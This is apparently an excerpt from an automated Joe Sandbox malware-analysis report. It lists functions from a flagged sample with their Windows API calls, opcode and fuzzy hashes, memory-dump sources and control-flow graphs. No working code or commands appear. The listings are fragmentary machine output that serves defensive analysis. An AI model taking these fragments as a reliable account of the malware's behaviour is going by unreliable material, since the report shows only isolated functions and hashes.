                                                                                                                      • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A475
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_TU0kiz3mxz.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Close
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3535843008-0
                                                                                                                      • Opcode ID: 3633968ca4f3d3abc0fc2ebd89152368de9531e50e60495f0fab90ebf612694e
                                                                                                                      • Instruction ID: 85268407bda5badd3f005600f786efbf3729bfdc64a558162e38e0f63659b094
                                                                                                                      • Opcode Fuzzy Hash: 3633968ca4f3d3abc0fc2ebd89152368de9531e50e60495f0fab90ebf612694e
                                                                                                                      • Instruction Fuzzy Hash: 00E0C272200204AFDB20DFA9DC89FEB7B68EF44364F14455AFA0CDB282C531E6118B90
                                                                                                                      Function 0041A450 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A475
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_TU0kiz3mxz.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Close
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3535843008-0
                                                                                                                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                      • Instruction ID: e48275ca6f7768b9f0fd4fab79f6d7fda959a909e55c262f35bdb2090c9231ed
                                                                                                                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                      • Instruction Fuzzy Hash: E5D01776200214ABD710EB99DC85EE77BADEF48764F15449ABA189B242C530FA1086E0
                                                                                                                      Function 01102B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 1eb63bc0a31705b8b50c71cf350c5bbdaf0718040e10bc9fba9c1a85ea39fc92
                                                                                                                      • Instruction ID: 380b514f1b228bc081d75c17ae9254c2119d2321acb5c64e8da0945d2a3bd4e4
                                                                                                                      • Opcode Fuzzy Hash: 1eb63bc0a31705b8b50c71cf350c5bbdaf0718040e10bc9fba9c1a85ea39fc92
                                                                                                                      • Instruction Fuzzy Hash: 9B90026224240003410971585514616900A97E1201B55C031E1015590DC72589916225
                                                                                                                      Function 01102BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 1623aa7e25c4266ea722206d5babad02515c3f86758c16eb13be7d051b3a3ee7
                                                                                                                      • Instruction ID: a97d590cc2441fe97374a348ef225c0c7b530a9c885c9f327d0efe79fc82d833
                                                                                                                      • Opcode Fuzzy Hash: 1623aa7e25c4266ea722206d5babad02515c3f86758c16eb13be7d051b3a3ee7
                                                                                                                      • Instruction Fuzzy Hash: 1090023224140803D1847158550464A500597D2301F95C025A0026654DCB158B5977A1
                                                                                                                      Function 01102AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 4902618203c84a710a8302ec44253152e3bbfbddbe42948af5055c18d0b3a7cc
                                                                                                                      • Instruction ID: bb80ee6a644a4d13a241bcf70687e77adda06130dc58ec189013a52a0ca52534
                                                                                                                      • Opcode Fuzzy Hash: 4902618203c84a710a8302ec44253152e3bbfbddbe42948af5055c18d0b3a7cc
                                                                                                                      • Instruction Fuzzy Hash: FA90043735140003010DF55C17045075047D7D7351355C031F1017550CD731CD715331
                                                                                                                      Function 01102D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: ef9038fa33cb8374523abc3e5b788f83910b3f494c4b44705fac9a0ef2255aa6
                                                                                                                      • Instruction ID: 47ec783c13350d00c6fecb8df1eda0765404297098ef74f093caedf616d7b3c8
                                                                                                                      • Opcode Fuzzy Hash: ef9038fa33cb8374523abc3e5b788f83910b3f494c4b44705fac9a0ef2255aa6
                                                                                                                      • Instruction Fuzzy Hash: 7390022A25340003D1847158650860A500597D2202F95D425A0016558CCB1589695321
                                                                                                                      Function 01102D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 36c7e015217356c5cfe5b64f3738de4e8acae833bc7ffce00d284161325ef9a2
                                                                                                                      • Instruction ID: 4d7fbd2b61014b47c020f5326d3fb0c5a9d228e24a8ab57affeee595efea0222
                                                                                                                      • Opcode Fuzzy Hash: 36c7e015217356c5cfe5b64f3738de4e8acae833bc7ffce00d284161325ef9a2
                                                                                                                      • Instruction Fuzzy Hash: 8D90022234140003D144715865186069005E7E2301F55D021E0415554CDB1589565322
                                                                                                                      Function 01102DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 3da9618bc08cabd6d2e5eac18d1e773da2f57aa5b6f4fd2dfcabe849dffef6c1
                                                                                                                      • Instruction ID: 07ec84986e349e873418cc0b275f2fe9209d884e2788ae7c54a8e750c7e0b0bb
                                                                                                                      • Opcode Fuzzy Hash: 3da9618bc08cabd6d2e5eac18d1e773da2f57aa5b6f4fd2dfcabe849dffef6c1
                                                                                                                      • Instruction Fuzzy Hash: D1900222282441535549B15855045079006A7E1241795C022A1415950CC7269956D721
                                                                                                                      Function 01102DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 5d9a15aca7a36438eb376c6fb6c13252becdbb6ea120c165e6ce8087ae58d6c2
                                                                                                                      • Instruction ID: 39b11356add0c70f76e2829180d6813ab33b9a01751b46f48a692bb2d15c2d5c
                                                                                                                      • Opcode Fuzzy Hash: 5d9a15aca7a36438eb376c6fb6c13252becdbb6ea120c165e6ce8087ae58d6c2
                                                                                                                      • Instruction Fuzzy Hash: 1390023224140413D11571585604707500997D1241F95C422A0425558DD7568A52A221
                                                                                                                      Function 01102C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 19075f9873a5780692e6441f285d5579ced662d4f631586fe0f860834abf7306
                                                                                                                      • Instruction ID: 909fc2b4ca3a4550b39ab19aeeb864a5ab6787f159b2023eaaf7fb7357fa332a
                                                                                                                      • Opcode Fuzzy Hash: 19075f9873a5780692e6441f285d5579ced662d4f631586fe0f860834abf7306
                                                                                                                      • Instruction Fuzzy Hash: B390023224148803D1147158950474A500597D1301F59C421A4425658DC79589917221
                                                                                                                      Function 01102CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: a9959d85da86b3ab5e2137638980e18e2b1c316c6ca18cc34ce2e95ec515c454
                                                                                                                      • Instruction ID: caf486c23f7d10561983d9f01938330bd44fdbd48d637f37d166cc29bba03e3c
                                                                                                                      • Opcode Fuzzy Hash: a9959d85da86b3ab5e2137638980e18e2b1c316c6ca18cc34ce2e95ec515c454
                                                                                                                      • Instruction Fuzzy Hash: 7F90023224140403D10475986508646500597E1301F55D021A5025555EC76589916231
                                                                                                                      Function 01102F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 143ea26a7016b28d0bdc6de41927e2a7a9df05cfa115d433f718bf90c54bfc7b
                                                                                                                      • Instruction ID: 8962f7a60ce07900451f513ede7e8aee07e69f896d8f36c8150418bfca071ff4
                                                                                                                      • Opcode Fuzzy Hash: 143ea26a7016b28d0bdc6de41927e2a7a9df05cfa115d433f718bf90c54bfc7b
                                                                                                                      • Instruction Fuzzy Hash: 9B90026238140443D10471585514B065005D7E2301F55C025E1065554DC719CD526226
                                                                                                                      Function 01102F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: d1bbe75ac1d26b38237ee347b380b14c95d6ae1a7e2f65813a23d60f29fc8a72
                                                                                                                      • Instruction ID: 13f29a008d4aff3de88beb20a29d6af7b8ac2b1267209e1b279975a7cb71e307
                                                                                                                      • Opcode Fuzzy Hash: d1bbe75ac1d26b38237ee347b380b14c95d6ae1a7e2f65813a23d60f29fc8a72
                                                                                                                      • Instruction Fuzzy Hash: 7390023224180403D1047158591470B500597D1302F55C021A1165555DC72589516671
                                                                                                                      Function 01102FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: c9ca84d1653219d67429ab37186532159a4aea1bcc6977a0e86228c676d782ee
                                                                                                                      • Instruction ID: c7573c559733c18d0b9ef95b84433b5540a2029404fa9d9445845791482fefe0
                                                                                                                      • Opcode Fuzzy Hash: c9ca84d1653219d67429ab37186532159a4aea1bcc6977a0e86228c676d782ee
                                                                                                                      • Instruction Fuzzy Hash: 42900222641400434144716899449069005BBE2211755C131A0999550DC75989655765
                                                                                                                      Function 01102FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: ee1309f940c715a6792472719e8172cdfdab6eabba6b7d5c3241aef6d70dc973
                                                                                                                      • Instruction ID: 1bcd6215ed89a47f4a9c973ee97d44075cf9abe8a4ec83358738595c0cacdc06
                                                                                                                      • Opcode Fuzzy Hash: ee1309f940c715a6792472719e8172cdfdab6eabba6b7d5c3241aef6d70dc973
                                                                                                                      • Instruction Fuzzy Hash: 3E900222251C0043D20475685D14B07500597D1303F55C125A0155554CCB1589615621
                                                                                                                      Function 01102E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 1ba55a1bb788a991ed6b0fad3871edd9e8e5f6b902f69c1397ce42d7affe2970
                                                                                                                      • Instruction ID: 6f7163a2a037d34a09574f2cdab892ab8aa50b620f195be909f9db5538d1929b
                                                                                                                      • Opcode Fuzzy Hash: 1ba55a1bb788a991ed6b0fad3871edd9e8e5f6b902f69c1397ce42d7affe2970
                                                                                                                      • Instruction Fuzzy Hash: 8B90022264140503D10571585504616500A97D1241F95C032A1025555ECB258A92A231
                                                                                                                      Function 01102EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 96fa2e2cf2ec3f67bdb396eab522cdb9bebfa11cffcc1e19062e420e5ffc4a0d
                                                                                                                      • Instruction ID: a2984a9d76550ab227d15d05a84e0b9cb3e1b4e89a737c2cafba31b589a276dc
                                                                                                                      • Opcode Fuzzy Hash: 96fa2e2cf2ec3f67bdb396eab522cdb9bebfa11cffcc1e19062e420e5ffc4a0d
                                                                                                                      • Instruction Fuzzy Hash: A290047334140403D144715C55047475005D7D1301F55C031F5075554FC75DCFD57775
                                                                                                                      Function 00409AA0 Relevance: .1, Instructions: 92COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_TU0kiz3mxz.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 853c01b66d24f589df6b89bde03758f04558a5ab365de05a0f584bb7a63a4c44
                                                                                                                      • Instruction ID: 4f20240aff7f2371bb6e5cfcebb6b85206ba00274494e6c7b70a30fa46eb6871
                                                                                                                      • Opcode Fuzzy Hash: 853c01b66d24f589df6b89bde03758f04558a5ab365de05a0f584bb7a63a4c44
                                                                                                                      • Instruction Fuzzy Hash: 48213CB2D4420957CB25D664AD52BFF737CAB54314F04007FE949A3182F638BF498BA6
                                                                                                                      Function 0041A5F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 3 41a5f0-41a621 call 41af20 RtlAllocateHeap
                                                                                                                      APIs
                                                                                                                      • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A61D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_TU0kiz3mxz.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap
                                                                                                                      • String ID: &EA
                                                                                                                      • API String ID: 1279760036-1330915590
                                                                                                                      • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                      • Instruction ID: 65e1271fa0e6f293e5ca7d904ec396d69fb6d51de338ced040ab1bfa87458b74
                                                                                                                      • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                      • Instruction Fuzzy Hash: 1DE012B2200208ABDB14EF99DC41EA777ADAF88668F118559BA085B242C630F9118AB0
                                                                                                                      Function 004082D4 Relevance: 1.6, APIs: 1, Instructions: 59threadwindowCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 202 4082d4-4082d8 203 408331-408343 call 40ace0 202->203 204 4082da-4082db 202->204 205 408347-40835a call 414e40 203->205 204->205 206 4082dd-4082fd call 41b860 call 41b710 204->206 214 40835c-40836e PostThreadMessageW 205->214 215 40838e-408392 205->215 217 408370-40838a call 40a470 214->217 218 40838d 214->218 217->218 218->215
                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_TU0kiz3mxz.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1836367815-0
                                                                                                                      • Opcode ID: 0c5670ac6251c0a60da8687f5d77d26f275b51540f007e75c674e4efe23d972f
                                                                                                                      • Instruction ID: 19c01656c3898c69e84ee8908718035e3049677ab4d7dde92baba569fadc05e3
                                                                                                                      • Opcode Fuzzy Hash: 0c5670ac6251c0a60da8687f5d77d26f275b51540f007e75c674e4efe23d972f
                                                                                                                      • Instruction Fuzzy Hash: 50012D3164031C77E711B5615C02FEE7358AB84B54F09017EFE44FB2C1DAB96D0642E9
                                                                                                                      Function 0040830C Relevance: 1.6, APIs: 1, Instructions: 56threadwindowCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 221 40830c-40833d call 41be20 call 41c9c0 226 408343-40835a call 414e40 221->226 227 40833e call 40ace0 221->227 231 40835c-40836e PostThreadMessageW 226->231 232 40838e-408392 226->232 227->226 233 408370-40838a call 40a470 231->233 234 40838d 231->234 233->234 234->232
                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_TU0kiz3mxz.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1836367815-0
                                                                                                                      • Opcode ID: 19c66865f75542f675f54a46dd6cd54def56d3851c5970707138c9339e0e24a1
                                                                                                                      • Instruction ID: 8733b47f60013285a8807cb7a5d81815fd96b1e7676cb7f4731c5b02c55d18d7
                                                                                                                      • Opcode Fuzzy Hash: 19c66865f75542f675f54a46dd6cd54def56d3851c5970707138c9339e0e24a1
                                                                                                                      • Instruction Fuzzy Hash: 7601D871A803187AE720A6918C03FFE6B1C9B41B55F05016EFF04FA1C1D6A9290647E9
                                                                                                                      Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 237 408310-40831f 238 408328-40833d call 41c9c0 237->238 239 408323 call 41be20 237->239 242 408343-40835a call 414e40 238->242 243 40833e call 40ace0 238->243 239->238 247 40835c-40836e PostThreadMessageW 242->247 248 40838e-408392 242->248 243->242 249 408370-40838a call 40a470 247->249 250 40838d 247->250 249->250 250->248
                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_TU0kiz3mxz.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1836367815-0
                                                                                                                      • Opcode ID: 6793861beeebbadff428f1e0055fcae04fb265a346085d9c044c4ec0df2940a0
                                                                                                                      • Instruction ID: a0f03ca10d03d1d5c38d3c187be8154ddc7636efa3ebbcfd239e67dddfad06e3
                                                                                                                      • Opcode Fuzzy Hash: 6793861beeebbadff428f1e0055fcae04fb265a346085d9c044c4ec0df2940a0
                                                                                                                      • Instruction Fuzzy Hash: B4018471A8032877E720A6959C43FFE776C6B40B54F05012AFF04BA1C1E6A8690546EA
                                                                                                                      Function 00408393 Relevance: 1.5, APIs: 1, Instructions: 48threadwindowCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 253 408393-408394 255 408333-40833d 253->255 256 40832e call 41c9c0 253->256 257 408343-40835a call 414e40 255->257 258 40833e call 40ace0 255->258 256->255 262 40835c-40836e PostThreadMessageW 257->262 263 40838e-408392 257->263 258->257 264 408370-40838a call 40a470 262->264 265 40838d 262->265 264->265 265->263
                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_TU0kiz3mxz.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1836367815-0
                                                                                                                      • Opcode ID: 8c991781031f8c6d473ebbd6a23dc71827103370b9fd2e7a6c452dfc9f5126f3
                                                                                                                      • Instruction ID: 3e3665392b07dc50b903ca1482a20c39a0d8d9c50d14a314250b7dbfb1e47f4d
                                                                                                                      • Opcode Fuzzy Hash: 8c991781031f8c6d473ebbd6a23dc71827103370b9fd2e7a6c452dfc9f5126f3
                                                                                                                      • Instruction Fuzzy Hash: 2DF02271A8032877E7206A544C02FFF27185B81F14F09016EFE84FA1C1DABE690202EA
                                                                                                                      Function 0041A781 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 292 41a781-41a7aa call 41af20 294 41a7af-41a7c4 LookupPrivilegeValueW 292->294
                                                                                                                      APIs
                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_TU0kiz3mxz.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: LookupPrivilegeValue
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3899507212-0
                                                                                                                      • Opcode ID: 6f60b12bae23740ddff04b9b2a435f9d619a484c6c9bb8091acf3cd8a9da8c8a
                                                                                                                      • Instruction ID: f7a5976cd5a0d784b45962738d5861c56f65e69eb5b5f090e7fa20213427d3ba
                                                                                                                      • Opcode Fuzzy Hash: 6f60b12bae23740ddff04b9b2a435f9d619a484c6c9bb8091acf3cd8a9da8c8a
                                                                                                                      • Instruction Fuzzy Hash: 10F0EDB2200204ABDB24DF55DC85EE733A9EF89318F1080AEF90D6B241CA35E805CBB0
